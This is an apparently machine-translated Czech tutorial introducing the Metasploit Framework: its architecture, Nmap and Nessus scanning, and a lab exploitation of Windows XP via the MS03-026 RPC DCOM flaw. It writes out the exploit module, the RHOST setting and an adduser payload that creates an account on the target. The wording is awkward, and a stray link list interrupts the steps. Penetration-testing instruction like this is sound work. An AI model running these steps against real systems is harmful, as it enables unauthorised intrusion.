Articles

Metasploit tutorial část 1: Vnitřní Metasploit framework

Metasploit Framework (Msf) je zdarma, open source penetrační testování řešení vyvinuté na open source komunitě a Rapid7. Tento výukový program Metasploit pokrývá základní strukturu Metasploitu a různé techniky shromažďování informací a skenování zranitelností pomocí tohoto nástroje. Metasploit eliminuje potřebu psaní jednotlivých exploitů, čímž šetří značný čas a úsilí.

použití Metasploit se pohybuje od hájit své vlastní systémy tím, vloupání do nich, k učení o chyby, které představují skutečné riziko. Stáhněte si Metasploit z http://www.metasploit.com Chcete-li maximalizovat učení z tohoto výukového programu metasploit.

Metasploit architektura; Základní metasploit tutorial

Obrázek 1. Metasploit architektury (s Laskavým svolením Rapid7)

Po instalaci, je snadné zjistit systém souborů a knihoven, jako pojmenování používá, je intuitivní a intuitivní. Metasploit je založen na skriptovacím jazyce, takže složka skriptu obsahuje meterpreter a další skripty požadované rámcem. Metasploit nabízí verzi GUI, stejně jako verzi příkazového řádku. Všechny funkce jsou přístupné pomocí nástroje příkazového řádku, ale někteří uživatelé mohou upřednostňovat GUI.

začínáme

K nastartování tohoto Metasploit tutorial, pojďme prolistovat základní stopu a zranitelnosti skenování pomocí tohoto nástroje, než se dostane do základní vykořisťování.

Metasploit má dobrou ustanovení pro shromažďování informací a skenování zranitelnosti, vzhledem k jeho integraci s dradis rámec a konfigurace s různými ovladače databáze, jako je mysql, sqlite a postgresql. To je podrobně popsáno na obrázku 2.

Metasploit DB Config; Základní metasploit tutorial

Obrázek 2. Konfigurace databáze v konzole Msf3 na Backtrack4

příkaz Nmap lze použít k provádění servisních skenů a shromažďování informací pomocí Msf3, jak je znázorněno na obrázku 3. Nmap lze nahradit příkazem db_nmap za účelem připojení k databázi a uložení informací.

nMap do Metasploit; Základní metasploit tutorial

Obrázek 3. Použití Nmap v konzole Msf, v Backtrack4

Další v tomto tutoriálu Metasploit přichází hodnocení zranitelnosti pomocí mostu mezi Nessus a Msf3 v Backtrack. Pro nové skenování pomocí Nessus použijte příkaz nessus_scan_new v konzole.

než to uděláte, jak je vidět na obrázku 4, nessus_connect se používá k připojení k běžícímu serveru nessus, jakmile jsou pověření uložena po nastavení.

Nessus Most s Metasploit; Základní metasploit tutorial

Obrázek 4. Pomocí Nessus most s Metasploit, v Backtrack4

dalším krokem v tomto Metasploit tutorial dostane do skutečného využívání pomocí Metasploit. Pokusme se využít systém v systému Windows XP s zranitelností RPC DCOM s útočným systémem se systémem Metasploit. Nastavení laboratoře zahrnuje systém Windows XP útočník s Metasploit framework nainstalován a Windows XP zranitelný systém, a to jak na VMware.

Metasploit Console; Basic Metasploit tutorial
Obrázek 5: Metasploit console

příkaz „Hledat dcom“ na konzole zobrazí seznam všech exploitů dostupných se vzorem dcom. Máme zájem o výsledek zobrazený jako “ přetečení rozhraní Microsoft RPC DCOM.“

Next, v konzole typu >> „použít windows/dcerpc/ms03_026_dcom“ následuje >> „zobrazit možnosti“

Metasploit RPC DCOM exploit možnosti; Základní metasploit tutorial
Obr. 6. Možnosti dostupné v RPC DCOM exploit

pak použijte následující příkaz k nastavení cíle i užitečného zatížení.

Web App skenování s Burp Suite

  • Burp Suite Guide: Část I – Základní nástroje
  • Burp Suite Tutorial: Část 2 – Vetřelec a repeater nástroje
  • Burp Suite výukový program: Část 3 – Sekvencer, dekodér a skladatel

>> set RHOST 192.168.1.2

tím se nastaví IP adresa našeho cílového systému, kde bychom chtěli provést tento útok. Další příkaz je:

>>set PAYLOAD windows/adduser

Tento náklad přidává nový uživatelský účet na počítači s Windows náchylné k tomuto exploitu. Tento výukový program Metasploit zobrazuje pouze jedno užitečné zatížení v akci zde; můžete vyzkoušet různé další užitečné zatížení dostupné zde.

Metasploit Konzole po užitečném zatížení; Základní metasploit tutorial
Obrázek 7. Console po nastavení náklad, ukazuje požadovaný modul a náklad detaily,

V konzole typu>> využít

Metasploit exploit spustit; Základní metasploit tutorial
Obrázek 8.Provedení exploitu

v tomto exploitu není vytvořena žádná relace; do cílového systému je přidán pouze nový uživatel. Cílový systém neměl vzdálenou havárii, protože exploity zde jsou testovány, aby se zajistilo, že nedojde k žádné havárii. Nyní zkontrolujte, zda je v cílovém systému vytvořen nový uživatel „metasploit“.

Metasploit post-exploit ověřování; Základní metasploit tutorial
Obrázek 9. Nový uživatel „metasploit“ je vytvořen

V první části této Metasploit tutorial, výše exploit je použitelná během této fáze pero testování, kdy uživatel musí být vytvořen přístup do cílového systému a eskalovat privilegia.

>>Přečtěte si více o Metasploit Meterpreter v druhé části této série<<

poznámka Autora: Tento Metasploit tutorial série začíná od základů a postupně se přesune na pokročilá témata, jako jsou vyhýbání se antivirový software s Metasploit Framework. Informace zde čerpá z „Metasploit Unleashed“ (http://www.offensive-security.com) a vyberte video klipy z Vivek Ramachandra, zakladatel SecurityTube.